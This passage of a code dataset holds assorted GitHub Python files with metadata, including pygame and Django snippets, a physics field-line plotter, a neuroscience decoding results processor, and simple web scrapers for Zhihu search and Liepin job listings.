pygame window\r\npygame.display.set_caption('IIPGH')\r\n\r\n# Here we load the image we want to use\r\nIcon = pygame.image.load('sample_logo.png')\r\n\r\n# We use set_icon to set new icon\r\npygame.display.set_icon(Icon)\r\n\r\n# Creating a bool value which checks if game is running\r\nrunning = True\r\n\r\n# Keep game running till running is true\r\nwhile running:\r\n\t\r\n\t# Check for event if user has pushed any event in queue\r\n\tfor event in pygame.event.get():\r\n\t\t\r\n\t\t# If event is of type quit then set running bool to false\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\trunning = False\r\n","repo_name":"barbara99/pygame_lessons","sub_path":"l3_name&icon_window.py","file_name":"l3_name&icon_window.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6089227732","text":"\ndef split_str(phrase: str, split_fix: int):\n phrase_split_list = []\n\n split = split_fix\n while split_fix < len(phrase):\n if len(phrase) > split and phrase[split_fix] == ' ':\n temp_phrase = phrase[:split_fix]\n phrase_split_list.append(temp_phrase)\n phrase = phrase[split_fix:]\n else:\n split = split_fix\n if len(phrase) > split_fix:\n for i in reversed(phrase[:split_fix]):\n if i == ' ':\n temp_phrase = phrase[:split]\n phrase_split_list.append(temp_phrase)\n phrase = phrase[split:]\n break\n else:\n split -= 1\n # else:\n # temp_phrase = phrase\n # phrase_split_list.append(temp_phrase)\n else:\n if phrase:\n temp_phrase = phrase\n phrase_split_list.append(temp_phrase)\n\n return phrase_split_list\n\n# text = 'Все иностранные граждане и лица без гражданства, независимо от возраста, следующие транзитом через территорию Российской Федерации должны предъявить медицинский сертификат об отрицательном результате ПЦР-теста на COVID-19, сделанном не ранее, чем за 48 часа до прибытия (сертификат предъявляется в распечатанном виде, на русском или английском языках (принимается нотариально заверенный перевод на русский язык). ' \\\n# 'Исключения: ' \\\n# 'граждане Российской Федерации. ' \\\n# 'Более подробная информация касательно правил въезда на территорию Российской Федерации изложена в Распоряжении Правительства Российской Федерации от 16.03.2020 N 635-р.; от 18.05.2021 г. №1291-р.'\n#\n# res = (split_str(text, 20))\n# for i in res:\n# print(i)\n# print(res[0:-1])\n","repo_name":"RuslanSlepuhin/travel_visa_bot","sub_path":"try_cut_str_len.py","file_name":"try_cut_str_len.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24943669077","text":"from django.urls import path, re_path\n\nfrom . import views\n\nurlpatterns = [\n #movies\n re_path(r\"^movie\\/?$\", views.MovieAllView.as_view()),\n path(\"movie//\", views.MovieOneDetailView.as_view()),\n\n #movie rating\n re_path(r\"^review\\/?$\", views.CreateReviewView.as_view()),\n re_path(r\"^rate\\/?$\", views.CreateRatingView.as_view()),\n\n #actors\n path(\"actors/\", views.AllActorView.as_view()),\n path(\"actors/\", views.ActorDetailView.as_view()),\n\n #categories\n path(\"category/\", views.ShowCategory.as_view()),\n path(\"categories/\", views.ShowAllCategory.as_view()),\n path(\"categories//\", views.ShowOneCategoryMovies.as_view()),\n]\n","repo_name":"mrpie228/kino_rest_proj","sub_path":"kino/backend/kino_main/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40371214437","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 12 15:23:44 2022\nCarte de champ : chap18 app1\n@author: remimetzdorff\n\"\"\"\n\n# Have a look at https://quickfield.com/glossary/magnetic_field_mapping.htm\n# and search for vector potential \n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom scipy.integrate import odeint\n\n# mu0 * I / 2 / np.pi / r0 = 1 # avec I = 1A\n\ndef mysavefig(filename):\n plt.tight_layout()\n plt.savefig(\"../images/chap18/\"+filename, bbox_inches=\"tight\", dpi=600)\n return\n\ndef champB_fil(x,y,x0,y0, r0=.05, I=1):\n r = np.sqrt((x-x0)**2 + (y-y0)**2)\n if r width/2:\n break\n elif np.abs(lineBy[-1]) > width/2:\n break\n elif dsquared < step**2:\n break\nax3.plot(lineBx, lineBy)\n\"\"\"\n\ndef plotter(ax):\n for sens in [-1,1]:\n def f(V,t):\n x, y = V\n Bx, By = champB(x, y, fils)\n B = np.sqrt(Bx**2 + By**2)\n dx = sens*Bx/B\n dy = sens*By/B\n return [dx, dy]\n \n M0s = [[k*width/50 - width/2,0] for k in range(51)]\n M0s = [[0,.6], [0,.7], [0,.9], [0, 1.5]]\n M0s += [[-1,-.6], [-1, -.7], [-1, -.9], [-1, -1.5]]\n M0s += [[1,-.6], [1, -.7], [1, -.9], [1, -1.5]]\n M0s += [[-.5,-.25], [1,-.05], [.4,.4], [1.25, .5], [1.5,.75],\n [.05,-1.25], [-2.5,-1], [-3.7,-1.7], [-1,3.6]]\n \n for M0 in M0s:\n t = np.linspace(0,15,1000)\n V = odeint(f, M0, t, rtol=1e-6,atol=1e-6)\n lineBx, lineBy = V[:,0], V[:,1]\n ax.plot(lineBx, lineBy, \"C0\", lw=1)\n return\n#ax3.streamplot(x, y, Bx, By, color=\"C0\", linewidth=1, cmap=plt.cm.inferno,density=2, arrowstyle='->', arrowsize=1.5)\nplotter(ax2)\n\nfor ax in [ax1, ax2]:\n ax.set_aspect(\"equal\")\n ax.set_xlim(-width/2,width/2)\n ax.set_ylim(-width/2,width/2)\n ax.axis(\"off\")\n\nfig, ax = plt.subplots(1, figsize=(6,4))\nplotter(ax)\nax.set_aspect(\"equal\")\nax.set_xlim(-4,4)\nax.set_ylim(-2.75,2.75)\nplt.axis(\"off\")\n\n#mysavefig(\"true_field_line.pdf\")\n\n\n\n\n\n\n\n\n\n","repo_name":"remimetzdorff/mp2i","sub_path":"python/chap18-app1.py","file_name":"chap18-app1.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"72266192147","text":"import string\n\nbook= open (\"book.txt\")\nbook1= book.read()\nbook2= book1.replace(\"-\",\" \")\nnew_book= book2.split()\nnew_book_list= []\nfor word in new_book:\n word1= word.strip(string.punctuation+string.whitespace)\n word2= word1.lower()\n new_book_list.append(word2)\nprint(new_book_list)\n\nword_list= open(\"words.txt\")\nnew_word_list=[]\nfor char in word_list:\n char= char.strip()\n new_word_list.append(char)\nprint(new_word_list)\n\ndef subtraction(l1, l2):\n temp=[]\n for item in l1:\n if item not in l2:\n temp.append(item)\n print(temp)\n print(len(temp))\n\nsubtraction(new_book_list, new_word_list )\n","repo_name":"sowmya1a/inwk6312summer2020-Lab4","sub_path":"homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71524465746","text":"mixed = [1,2,3,4,5,'rehan','shazia','nazia']\r\nmixed.append('tiger')\r\nprint(mixed)\r\n\r\nfruits=[]\r\nfruits.append('mango')\r\nfruits.append('grapes')\r\nprint(fruits)\r\n\r\n\r\n# to add element to a particular position #INSERT METHOD\r\nfruits=['mango','grapes','guava','litchi']\r\nanimals=['tiger','lion','man','monkey']\r\nfruits.insert(1,'orange')\r\nprint(fruits)\r\nsummation= fruits+animals\r\nprint(summation)\r\n\r\n# EXTEND METHOD\r\nanimals.extend(fruits)\r\nanimals.append(fruits)\r\nprint(animals)\r\nfruits.append(animals)\r\nfruits.extend(animals)\r\nprint(fruits)\r\n","repo_name":"rehanjamil10/python..py","sub_path":"append.py","file_name":"append.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41132514095","text":"#!/usr/bin/python3\n\"\"\" This Module implements a Base Image Query object \"\"\"\nimport uuid\nimport os\nimport pickle\n#from models.api_users import Users\n\n\nclass ImageQuery():\n \"\"\" A reresentation of an image query object \"\"\"\n \n def __init__(self, image_file, username, classification_results):\n self.image_file = image_file \n self.classification = classification_results\n self.username = username\n \n \n \n def save_to_pickle(self, user_key):\n \"\"\" generate unique directory for user_key\n Args:\n user_key (str): The User provided Api-Key\n \"\"\"\n \n if Exception:\n print('An Exception Occured: {}'.format(Exception))\n return str(Exception)\n try:\n \n project_base_directory = os.getcwd()\n storage_directory = os.path.join(project_base_directory, 'pickle_file_storage')\n print(storage_directory)\n os.makedirs(storage_directory, exist_ok=True)\n user_directory = os.path.join(storage_directory, user_key)\n os.makedirs(user_directory, exist_ok=True)\n \n filename = str(uuid.uuid4())\n file_path = os.path.join(user_directory, filename + '.pickle')\n \n # Pickle the ImageQuery object\n with open (file_path, 'wb') as pickle_file:\n pickle.dump(self, pickle_file)\n \n print(\"Object Successfully Pickled!\")\n return pickle_file\n \n except pickle.PicklingError as PE:\n print(\"Error in Creating Pickle!: {}\".format(PE))\n return False\n \n except (IOError, FileNotFoundError) as IOErrors:\n print(\"Error occured when working on file: {}\".format(IOErrors))\n return False\n \n except Exception as E:\n print(\" An Error Occured: {}\".format(E))\n return False\n \n \n \n def load_from_pickle(self, pickle_file):\n \"\"\" This Function de-serializes a pickle file\n into the original ImageQuery object\n\n Args:\n pickle_file(file): The pickled file to deserialize\n \n Returns:\n class: The instance of the pickled class.\n \"\"\"\n \n try:\n with open(pickle_file, 'rb') as file:\n serial_query_obj = pickle.load(file)\n \n # Verify the object was succefully created\n print('This object: {} was successfully un-pickled'.format(serial_query_obj.__dict__))\n return serial_query_obj\n \n except pickle.PickleError as PE:\n print(\"Error occurred during unpickling: {}\".format(PE))\n return None\n\n except (IOError, FileNotFoundError) as IOErrors:\n print(\"Error occurred while opening or reading the file: {}\".format(IOErrors))\n return None\n\n except AttributeError as Attr_Error:\n print(\"Error occurred during unpickling. Attribute not found: {}\".format(Attr_Error))\n return None\n\n except Exception as E:\n print(\"An error occurred:\", str(E))\n return None\n \n def delete_pickle_file(self):\n # call the pickle_file delete method\n # also handle any database in any\n pass","repo_name":"AtangfMokamogo/NullExplicit_API","sub_path":"models/image_query.py","file_name":"image_query.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32277606999","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 2 08:58:41 2022\n\n@author: bensonb\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import r2_score, balanced_accuracy_score\n\n\ndef gini(x, weights=None):\n '''\n Index that measures sparsity across a set of values, x.\n If values in x are roughly constant, then this index is near 0.\n If values in x have a large spread, then this index is near 1.\n\n Implementation copied from \n https://stackoverflow.com/questions/48999542/more-efficient-weighted-gini-coefficient-in-python\n\n Parameters\n ----------\n x : 1-d array of values\n .\n weights : 1-d array, floats\n weightings corresponding to values of x. The default is None.\n\n Returns\n -------\n float\n\n '''\n if weights is None:\n weights = np.ones_like(x)\n # Calculate mean absolute deviation in two steps, for weights.\n count = np.multiply.outer(weights, weights)\n mad = np.abs(np.subtract.outer(x, x) * count).sum() / count.sum()\n rmad = mad / np.average(x, weights=weights)\n # Gini equals half the relative mean absolute deviation.\n return 0.5 * rmad\n\n\ndef fix_pd_regions(res):\n '''\n Takes a pandas dataframe and fixes the 'region' column.\n Regions are often lists with single values which makes dataframe\n manipulation difficult. This function fixes that by removing \n the list and using the single value\n\n If regions which are not of type list are not changed\n\n A region list with multiple elements causes an assertion error\n\n Parameters\n ----------\n res : pandas dataframe\n must have a column called 'region'\n Returns\n -------\n pandas dataframe\n\n '''\n\n print('fixing pd regions')\n res = res.reset_index()\n l = len(res.loc[:,'region'])\n for i, r in enumerate(res.loc[:,'region']):\n if i%2000==0:\n print(f'fixed {i/l:.4f} of table')\n if type(r) is list:\n assert len(r) == 1\n res.loc[i,'region'] = r[0]\n return res\n\n\ndef get_val_from_realsession(reseidreg, value_name, RUN_ID=1):\n '''\n helper function meant to take a pandas dataframe, reseidreg, of decoding results from\n a single eid and a single region. The value corresponding to the value_name column,\n RUN_ID number, and pseudo_id=-1 is returned. There should only be one such value, so \n if the dataframe contains mutliple, then None is returned. If the value is None, then\n None is returned. \n\n Parameters\n ----------\n reseidreg : pandas dataframe\n Decoding results from a single eid and single region. \n .\n value_name : str\n the name of a column in reseidreg\n .\n RUN_ID=1 : int\n The run id of the desired decoding value. Decoding is often repeated multiple \n times to reduce variability, and run id indexes these repetitions. Default is 1.\n\n Returns\n -------\n numpy array with a single value\n\n '''\n\n my_vals = list(reseidreg.loc[(reseidreg['pseudo_id']==-1)&(reseidreg['run_id']==RUN_ID), value_name])\n if (len(my_vals) != 1) or (my_vals[0] is None):\n return None\n return np.array(my_vals[0])\n\n\ndef check_scores(my_preds, my_targets, score_name, real_scores):\n '''\n checks whether the predictions produce the same performance \n scores as those that are given in the real_scores array. \n Compares predictions (my_preds) and targets (my_targets) to produce the\n desired score_name and returns True if calculated scores all match the\n recored scores\n\n Parameters\n ----------\n my_preds : list of 2-d arrays\n 2-d arrays are decoder predictions across trials. Assumed that \n second dimension has size 1 i.e. not wheel decoding. The list indexes\n across run ids\n my_targets : 2-d array\n Same format as my_preds, but not a list (targets are the same for all run ids).\n score_name : str, 'balanced_acc_test' or 'R2_test'\n These are the two test statistics used to quantify BWM decoding performance: \n balanced_accuracy_score and r2_score from sklearn.metrics. \n real_scores : 1-d array\n The recored scores of decoding performance across run id.\n\n Returns\n -------\n boolean\n\n '''\n\n my_targets_flat = my_targets[:,0]\n my_preds_flat = [my_preds[pi][:,0] for pi in range(my_preds.shape[0])]\n assert len(my_targets_flat.shape)==1\n assert np.all(np.array([len(p.shape) for p in my_preds_flat])==1)\n \n if score_name == 'balanced_acc_test':\n calc_score = lambda x: balanced_accuracy_score(my_targets_flat, x)\n elif score_name == 'R2_test':\n calc_score = lambda x: r2_score(my_targets_flat, x)\n my_calc_real_scores = [calc_score(p) for p in my_preds_flat]\n isequal_scores = [np.isclose(my_calc_real_scores[i],real_scores[i]) for i in range(len(real_scores))]\n return np.all(np.array(isequal_scores))\n\n\ndef create_pdtable_from_raw(res, \n score_name='balanced_acc_test',\n N_PSEUDO=200, N_RUN=10, \n N_PSEUDO_LOWER_THRESH = np.infty,\n RETURN_X_Y=False,\n SCALAR_PER_TRIAL=True,\n SAVE_REGRESSORS=True):\n '''\n Takes formatted outputs of decoders and aggregates important values for post-processing\n including subject, eid, region, test statistic, p-value, median of null distribution,\n number of units used for decoding, fraction of weights which exceed a threshold of 0.1, \n and the gini index of the weights to capture sparsity.\n Optionally returns a secondary table which also includes all the regressors, targets,\n predictions, and weights.\n\n Parameters\n ----------\n res : pandas DataFrame \n formatted as done in the output of 04_format_slurm.py.\n score_name : str, optional\n 'balanced_acc_test' or 'R2_test'. The default is 'balanced_acc_test'.\n N_PSEUDO : int, optional\n from settings.py. The default is 200.\n N_RUN : int, optional\n from settings.py. The default is 10.\n N_PSEUDO_LOWER_THRESH : scalar, optional\n if finite, allows processing of outputs when not all N_PSEUDO nulls are present. \n The default is np.infty.\n RETURN_X_Y : bool\n Only works for scalar values per trial, e.g. not wheel-speed. \n returns an additional table with regressors, targets, and predictions\n The default is False.\n SCALAR_PER_TRIAL : bool\n set to False if decoding multiple values per trial e.g. wheel decoding\n The default is True.\n SAVE_REGRESSORS : bool\n if RETURN_X_Y then the returned xy-table's regressors columns will be empty if\n SAVE_REGRESSORS if False. Either way, the same checks are done on regressors',\n representation, they are just not saved.\n The default is True.\n\n Returns\n -------\n pandas DataFrame \n summary of all decoding test statistics, p-values, weight analysis, and units.\n pandas DataFrame\n Optional, only returned if RETURN_X_Y.\n summary of add decoder regressors, targets, and weights\n\n '''\n if not score_name in ['balanced_acc_test', 'R2_test']:\n raise NotImplementedError('this score is not implemented')\n \n res_table = []\n xy_table = []\n \n for eid in np.unique(res['eid']):\n print(f'working on {eid}')\n reseid = res.loc[res['eid']==eid]\n subject = np.unique(reseid['subject'])\n assert len(subject) == 1\n subject = subject[0]\n \n #print(reseid['region'])\n for reg in np.unique(reseid['region']):\n \n reseidreg = reseid.loc[reseid['region']==reg]\n eidreg_probes = np.unique(reseidreg['probe'])\n assert len(eidreg_probes) == 1 \n \n pids = np.sort(np.unique(reseidreg['pseudo_id']))\n #print(reseidreg.head())\n if len(pids) == N_PSEUDO+1:\n assert pids[0] == -1\n assert np.all(pids[1:] == np.arange(1,N_PSEUDO+1))\n real_scores = [get_val_from_realsession(reseidreg, \n score_name, \n RUN_ID=runid) for runid in range(1,N_RUN+1)]\n #real_scores = reseidreg.loc[reseidreg['pseudo_id']==-1,score_name]\n #assert len(real_scores) == N_RUN\n # elif len(pids) >= N_PSEUDO_LOWER_THRESH+1 and pids[0] == -1:\n # print('not full pseudo_ids', len(pids))\n # real_scores = reseidreg.loc[reseidreg['pseudo_id']==-1,score_name]\n # assert len(real_scores) >= N_RUN - 1\n \n else:\n print(f'skipping eid ({eid}) and region ({reg}) because only {len(pids)} pseudo_ids are present')\n continue\n \n ws = list(reseidreg.loc[reseidreg['pseudo_id']==-1, 'weights'])\n my_weights = np.stack(ws)\n assert len(ws)==N_RUN\n ws = np.abs(np.ndarray.flatten(my_weights))\n #print(ws)\n frac_lg_w = np.mean(ws > 0.1)#1.0/len(ws))\n gini_w = gini(ws)\n # 10 repeats of decoding to reduce variance\n score = np.mean(real_scores)\n \n # include real score in null scores\n n_runs_per_p = [len(np.array(reseidreg.loc[reseidreg['pseudo_id']==pid,score_name])) for pid in pids]#[1:]\n assert np.all(np.array(n_runs_per_p)==N_RUN)\n p_scores = [np.mean(reseidreg.loc[reseidreg['pseudo_id']==pid,score_name]) for pid in pids]#[1:]\n if np.any(np.isnan(p_scores)):\n print(f'skipping eid ({eid}) and region ({reg}) because {np.sum(np.isnan(p_scores))} scores are nan')\n continue\n \n median_null = np.median(p_scores)\n pval = np.mean(np.array(p_scores)>=score)\n n_units = np.array(reseidreg.loc[reseidreg['pseudo_id']==-1,'N_units'])\n assert np.all(n_units == n_units[0])\n n_units = n_units[0]\n \n if RETURN_X_Y:\n \n # load regressors\n my_regressors = get_val_from_realsession(reseidreg, 'regressors')\n if my_regressors is None:\n print(f'skipping eid ({eid}) and region ({reg}) because regressors are not present')\n continue\n\n # load cluster uuids\n my_cuuids = [get_val_from_realsession(reseidreg,\n 'cluster_uuids',\n RUN_ID=runid) for runid in range(1,N_RUN+1)]\n if np.any(np.array([c is None for c in my_cuuids])):\n print(f'skipping eid ({eid}) and region ({reg}) becuase cluster uuids are not present')\n continue\n assert np.all([np.all(np.array(my_cuuids[0])==np.array(c)) for c in my_cuuids])\n my_cuuids = my_cuuids[0]\n \n # load targets\n my_targets = get_val_from_realsession(reseidreg, 'target')\n if my_targets is None:\n print(f'skipping eid ({eid}) and region ({reg}) because targets are not present')\n continue\n \n # load predictions\n my_preds = [get_val_from_realsession(reseidreg, \n 'prediction', \n RUN_ID=runid) for runid in range(1,N_RUN+1)] \n my_preds = np.stack(my_preds)\n assert my_preds.shape[0] == N_RUN\n \n if np.any(np.array([mps is None for mps in my_preds])):\n print(f'skipping eid ({eid}) and region ({reg}) because predictions are not present')\n continue\n\n my_intercepts = np.stack(list(reseidreg.loc[reseidreg['pseudo_id']==-1, 'intercepts']))\n my_idxes = np.stack(list(reseidreg.loc[reseidreg['pseudo_id']==-1, 'idxes_test']))\n\n # load parameters\n my_params = [get_val_from_realsession(reseidreg, \n 'params', \n RUN_ID=runid) for runid in range(1,N_RUN+1)] \n if np.any(np.array([mps is None for mps in my_params])):\n print(f'skipping eid ({eid}) and region ({reg}) because params are not present')\n continue\n my_params = [[[(k,mp_fold[k]) for k in mp_fold.keys()] for mp_fold in mp_run] for mp_run in my_params]\n my_params = np.stack(my_params)\n assert my_params.shape[0] == N_RUN\n \n # load mask\n my_masks = [get_val_from_realsession(reseidreg, \n 'mask', \n RUN_ID=runid) for runid in range(1,N_RUN+1)]\n my_masks_trials_and_targets = [get_val_from_realsession(reseidreg,\n 'mask_trials_and_targets',\n RUN_ID=runid) for runid in range(1,N_RUN+1)]\n my_masks_diagnostics = [get_val_from_realsession(reseidreg,\n 'mask_diagnostics',\n RUN_ID=runid) for runid in range(1,N_RUN+1)] \n \n if np.any(np.array([m is None for m in my_masks])):\n print(f'skipping eid ({eid}) and region ({reg}) because mask is not present')\n continue\n assert np.all(np.array(my_masks)==my_masks[0])\n #print(type(my_masks[0]), my_masks[0].shape)\n my_mask = str(my_masks[0])\n my_mask = [int(my_mask[mi]) for mi in range(len(my_mask))]\n assert np.all(np.unique(my_mask)==np.array([0,1]))\n \n \n # check arrays\n assert my_targets.shape == my_preds[0].shape\n assert my_regressors.shape[0] == my_targets.shape[0]\n assert np.sum(my_mask) == my_targets.shape[0]\n if SAVE_REGRESSORS: # TODO, hack for wheel, check why this fails for wheel\n assert len(my_cuuids) == my_regressors.shape[-1]\n #if np.any(np.array([len(np.unique(my_preds[pi]))==1 for pi in range(my_preds.shape[0])])):\n #print(f'at least one pred is constant {eid} {reg}', )\n #continue\n \n if SCALAR_PER_TRIAL:\n check_preds = (my_preds > 0.5) if score_name == 'balanced_acc_test' else my_preds\n \n #print('############# debugging ###################')\n #my_preds_flat = [my_preds[pi][:,0]>0.5 for pi in range(my_preds.shape[0])]\n #my_targets_flat = my_targets[:,0]\n #assert len(my_targets_flat.shape)==1\n #assert np.all(np.array([len(p.shape) for p in my_preds_flat])==1)\n\n #if score_name == 'balanced_acc_test':\n #calc_score = lambda x: balanced_accuracy_score(my_targets_flat, x)\n #elif score_name == 'R2_test':\n # calc_score = lambda x: r2_score(my_targets_flat, x)\n \n #print('shapes')\n #print(my_preds_flat[0].shape, my_targets_flat.shape)\n #print('errors')\n #errs = (my_preds_flat[0] != my_targets_flat)\n #print(np.nonzero(errs))\n #print(my_preds_flat[0])\n #print(real_scores)\n \n #my_calc_real_scores = [calc_score(p) for p in my_preds_flat]\n #print(my_calc_real_scores)\n #isequal_scores = [np.isclose(my_calc_real_scores[i],real_scores[i]) for i in range(len(real_scores))]\n #print('return', np.all(np.array(isequal_scores)))\n \n \n \n if not check_scores(check_preds, \n my_targets, \n score_name, \n real_scores):\n #print(my_preds, check_preds, my_targets, real_scores)\n raise ValueError('recorded scores do not match calculated scores')\n \n res_table.append([subject,\n eid,\n reg,\n score,\n pval,\n median_null,\n n_units,\n frac_lg_w,\n gini_w])\n if RETURN_X_Y:\n if not SAVE_REGRESSORS:\n my_regressors = []\n xy_table.append([f'{eid}_{reg}', \n my_regressors, \n my_targets, \n my_preds,\n my_mask,\n (my_masks_trials_and_targets, my_masks_diagnostics),\n my_weights,\n my_intercepts,\n my_idxes,\n my_params,\n my_cuuids])\n \n res_table = pd.DataFrame(res_table, columns=['subject',\n 'eid',\n 'region',\n 'score',\n 'p-value',\n 'median-null',\n 'n_units',\n 'frac_large_w',\n 'gini_w'])\n \n if RETURN_X_Y:\n xy_table = pd.DataFrame(xy_table, columns=['eid_region',\n 'regressors',\n 'targets',\n 'predictions',\n 'mask',\n 'mask_diagnostics',\n 'weights',\n 'intercepts',\n 'idxes',\n 'params',\n 'cluster_uuids'])\n return res_table, xy_table\n \n return res_table\n","repo_name":"int-brain-lab/paper-brain-wide-map","sub_path":"brainwidemap/decoding/functions/process_outputs.py","file_name":"process_outputs.py","file_ext":"py","file_size_in_byte":19180,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"28333364904","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 5 05:49:37 2021\n\n@author: iviti\n\"\"\"\nimport pygame\nimport time\nimport random\nimport math\n#bulletList = []\n#npcList = [] #list of npcs\n\nreloadTime = 4 #time betwen shots\nspawnRate = 30\nbulletRange = 15 #distance at which bullet hits someone\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0,0,255) \nYELLOW = (128,128,0)\nGREY = (100,100,100)\nscreenSize = [1000, 700]\nscreen = pygame.display.set_mode(screenSize)\nnNpcs = 1 #number of npcs\nbaseRange = 50\nnTeams = 2 #number of npc teams + 1 (player)\nnBases = 2\nplayerSpawnRate = 5\nplayerReloadTime = 2\n","repo_name":"skywo1f/gamjam","sub_path":"constants_h.py","file_name":"constants_h.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2060164642","text":"from django.db import models\n\n# Create your models here.\n\n\nclass ProducerModel(models.Model):\n mal_id = models.IntegerField(unique=True, blank=False, null=False, db_index=True)\n name = models.CharField(\n unique=True,\n max_length=50,\n default=\"\",\n null=False,\n blank=False,\n db_index=True,\n )\n type = models.CharField(max_length=50, default=\"\", null=False, blank=False)\n\n def __str__(self) -> str:\n return f\"{self.mal_id}. {self.name} ({self.type})\"\n\n class Meta:\n verbose_name = \"Producer\"\n verbose_name_plural = \"Producers\"\n","repo_name":"Arc0687/anime.arc","sub_path":"backend/django_core/apps/producers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"40362684449","text":"import requests,re\n\nurls = 'https://www.zhihu.com/search?q=%E6%B5%B7%E5%8D%97&type=content'\n# data = {\n# 'q': '海南',\n# 'range': 1,\n# 'type': 'content'\n# }\nheaders = {\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Connection': 'keep-alive',\n # 'Content-Encoding': 'gkb',\n # 'Content-Length': 363,\n 'Content-Type': 'application/x-protobuf',\n 'Referer': 'https://www.zhihu.com/',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36'\n\n }\nrep = requests.post(urls,headers=headers)\nrep.encoding = 'utf-8'\ntext = rep.text\nprint(text)","repo_name":"bigbiggh/script","sub_path":"PytestLearn/demo01/test_Scrapy.py","file_name":"test_Scrapy.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34202713635","text":"# -*- coding = utf-8 -*-\n# @Time : 2020/10/21 19:13\n# @Author : LiJunChao\n# @File : test.py\n# @SoftWare : PyCharm\n\n\nimport time\nimport jieba\nfrom wordcloud import WordCloud\nimport re\nimport urllib.request,urllib.error\nfrom jieba import analyse\nfrom bs4 import BeautifulSoup\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nimport numpy as np\n\n\ndef main():\n url = \"https://www.liepin.com/zhaopin/?\"\n jobs = ['%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98',\n '%E5%9B%BE%E5%83%8F%E7%AE%97%E6%B3%95%E5%B7%A5%E7%A8%8B%E5%B8%88',\n 'Java%E5%90%8E%E7%AB%AF',\n '%E4%BA%92%E8%81%94%E7%BD%91%E4%BA%A7%E5%93%81%E7%BB%8F%E7%90%86'] #不同职业\n citys = ['北京', '上海', '深圳', '广州', '武汉', '杭州']\n job = ['数据挖掘', '图像算法工程师', 'java后端', '互联网产品经理']\n cityIds = ['010', '020', '050090', '050020', '170020', '070020']\n\n geturls(url,jobs,cityIds,citys,job)\n\njoblink = re.compile(r'\" href=\"(.*)\" target=\"_blank\">') #匹配链接的正则表达式\nasklink = re.compile('

[\\s\\S]*?(?<=任职资格|任职要求)[::]?([\\s\\S]*?)(?<=
)?
')\n\ndef geturls(url,jobs,cityIds,citys,job):\n for k in range(1,2):#0-4表示不同的职业\n for j in range(0,1): #表示不同地区的网址0-6\n urls = url + 'key=' + jobs[k] + '&dqs=' + cityIds[j]\n getData(urls,job[k],citys[j])\n\ndef askurl(urls):\n try:\n head = {\n #\"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)\"\n #\"User-Agent\": \"SafariWin7:Mozilla / 5.0(WindowsNT6.1;WOW64) AppleWebKit / 534.50(KHTML, likeGecko) Version / 5.1Safari / 534.50\"\n \"User-Agent\":\"Mozilla / 5.0(WindowsNT6.1;WOW64) AppleWebKit / 535.1(KHTML, likeGecko) Chrome / 14.0.835.163Safari / 535.1\"\n }\n urls = urllib.request.Request(urls,headers=head)\n #urls = urllib.request.Request(urls)\n request = urllib.request.urlopen(urls)\n html = request.read().decode(\"utf-8\")\n except urllib.error.URLError as e:\n if hasattr(e,\"code\"):\n print(e.code)\n if hasattr(e,\"reason\"):\n print(e.reason)\n return html\n\n\n#筛选出网页的网址\ndef getData(urls,jobs,city):\n zhaopin = []\n for i in range(0, 1): # 表示不同页数0-10\n urls = urls + '&curPage=' + str(i)\n html = askurl(urls) # 将生成的网址传到askurl获取网页信息\n print(html)\n soup = BeautifulSoup(html,\"html.parser\")\n for item in soup.find_all('div',class_=\"job-info\"):\n #print(item)\n item = str(item) #findall函数只能用字符串\n wz = re.findall(joblink,item)\n wz = wz[0].replace(\"[,',]\", \"\") # 去掉括号和双引号\n wz = str(wz) #将网址改成字符串用来匹配和存入列表\n if wz.find(\"https\") == -1: #将不符合规则的网址加上前缀存入\n wz = 'http://www.liepin.com/' + wz\n zhaopin.append(wz)\n else:\n zhaopin.append(wz)\n time.sleep(0.2)\n #print(wz)\n # require = []\n saveData(zhaopin) 